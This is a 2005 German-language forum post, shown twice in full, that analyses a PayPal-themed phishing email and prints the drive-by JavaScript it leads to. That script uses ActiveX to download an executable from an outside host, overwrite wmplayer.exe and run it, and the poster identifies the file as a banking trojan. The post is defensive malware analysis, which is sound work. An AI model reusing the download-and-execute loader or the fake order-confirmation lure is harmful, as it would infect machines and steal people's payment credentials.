Extreme
05-02-05, 20:35
Hallo zusammen:
Nachricht:
From - Sun Jan 30 14:55:22 2005
X-Account-Key: account2
X-UIDL: LJ~!!jG-!!G2e"!8Tc!!
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <piteshman@shop.com>
Delivered-To: *********@dd2004.kasserver.com
Received: from UserMail1.FreeCity.De (usermail1.freecity.de [81.88.35.51])
by dd2004.kasserver.com (Postfix) with ESMTP id 13CE49D763
for <Info@x-nomine.de>; Sat, 29 Jan 2005 22:18:18 +0100 (CET)
Received: from 194.42.24.10 (pi10.pi.ac.cy [194.42.24.10])
by UserMail1.FreeCity.De (Postfix) with SMTP id B21041A0058EE
for <info@web-breaker.de>; Sat, 29 Jan 2005 22:19:46 +0100 (CET)
X-Message-Info: V/km+3+td/F+42/444321127952331
Received: from smtp-credenza.areaway.piteshman@shop.com ([]) by g270-wvi9.piteshman@shop.com with Microsoft SMTPSVC(5.0.5203.4611);
Sun, 30 Jan 2005 02:52:19 -0500
Received: from smtp-pensive.florid.piteshman@shop.com ([]) by bv57-cg32.piteshman@shop.com with Microsoft SMTPSVC(5.0.2333.6235);
Sun, 30 Jan 2005 11:53:19 +0400
X-Message-Info: NCDZ+%ND_LC_CHAR[1-3]7+ie+NDW+482/198368156710
Received: (qmail 41314 invoked by uid 830); Sun, 30 Jan 2005 01:46:19 -0600
Date: Sun, 30 Jan 2005 00:52:19 -0700
Message-Id: <0669230252.31056@piteshman@shop.com>
From: PayPal Support <piteshman@shop.com>
To: Info <info@web-breaker.de>
Subject: Sony DSC-F828 8.0MP Digital Camera
MIME-Version: 1.0 (produced by francesanew 7.4)
Content-Type: multipart/alternative;
boundary="--206346472488856940"
X-UIDL: LJ~!!jG-!!G2e"!8Tc!!
----206346472488856940
Content-Type: text/html;
charset="iso-5877-2"
Content-Transfer-Encoding: 7Bit
Content-Description: cicada avocet alkaloid
Sony DSC-F828 8.0MP Digital Camera<br><br>
Your order # 12405 has been accepted for the amount 840.00$ <br>
Your card will be charged in that amount .Thank you for your purchase.<br><br><br>
You can check the order in your profile. <br><br>
<a href="http://jeysiksnet.net">http://jeysiksnet.net</a>;
----206346472488856940--
Bei link wird eine Iframe geladen, welche die javascript_loader.js bei redirect auf eine seite öffnet.
Diese wiederum öffnet die shellcode.js aus. Code:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://jeysiksnet.netfirms.com/demo.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
habe die demo.exe analysiert:
TrojanSpy.Win32.Banker.bq
vermutlich loggt er die Zugansdaten zu PayPal mit und sendet sie nach hause.
Grüße
Extreme
Nachricht:
From - Sun Jan 30 14:55:22 2005
X-Account-Key: account2
X-UIDL: LJ~!!jG-!!G2e"!8Tc!!
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <piteshman@shop.com>
Delivered-To: *********@dd2004.kasserver.com
Received: from UserMail1.FreeCity.De (usermail1.freecity.de [81.88.35.51])
by dd2004.kasserver.com (Postfix) with ESMTP id 13CE49D763
for <Info@x-nomine.de>; Sat, 29 Jan 2005 22:18:18 +0100 (CET)
Received: from 194.42.24.10 (pi10.pi.ac.cy [194.42.24.10])
by UserMail1.FreeCity.De (Postfix) with SMTP id B21041A0058EE
for <info@web-breaker.de>; Sat, 29 Jan 2005 22:19:46 +0100 (CET)
X-Message-Info: V/km+3+td/F+42/444321127952331
Received: from smtp-credenza.areaway.piteshman@shop.com ([]) by g270-wvi9.piteshman@shop.com with Microsoft SMTPSVC(5.0.5203.4611);
Sun, 30 Jan 2005 02:52:19 -0500
Received: from smtp-pensive.florid.piteshman@shop.com ([]) by bv57-cg32.piteshman@shop.com with Microsoft SMTPSVC(5.0.2333.6235);
Sun, 30 Jan 2005 11:53:19 +0400
X-Message-Info: NCDZ+%ND_LC_CHAR[1-3]7+ie+NDW+482/198368156710
Received: (qmail 41314 invoked by uid 830); Sun, 30 Jan 2005 01:46:19 -0600
Date: Sun, 30 Jan 2005 00:52:19 -0700
Message-Id: <0669230252.31056@piteshman@shop.com>
From: PayPal Support <piteshman@shop.com>
To: Info <info@web-breaker.de>
Subject: Sony DSC-F828 8.0MP Digital Camera
MIME-Version: 1.0 (produced by francesanew 7.4)
Content-Type: multipart/alternative;
boundary="--206346472488856940"
X-UIDL: LJ~!!jG-!!G2e"!8Tc!!
----206346472488856940
Content-Type: text/html;
charset="iso-5877-2"
Content-Transfer-Encoding: 7Bit
Content-Description: cicada avocet alkaloid
Sony DSC-F828 8.0MP Digital Camera<br><br>
Your order # 12405 has been accepted for the amount 840.00$ <br>
Your card will be charged in that amount .Thank you for your purchase.<br><br><br>
You can check the order in your profile. <br><br>
<a href="http://jeysiksnet.net">http://jeysiksnet.net</a>;
----206346472488856940--
Bei link wird eine Iframe geladen, welche die javascript_loader.js bei redirect auf eine seite öffnet.
Diese wiederum öffnet die shellcode.js aus. Code:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://jeysiksnet.netfirms.com/demo.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
habe die demo.exe analysiert:
TrojanSpy.Win32.Banker.bq
vermutlich loggt er die Zugansdaten zu PayPal mit und sendet sie nach hause.
Grüße
Extreme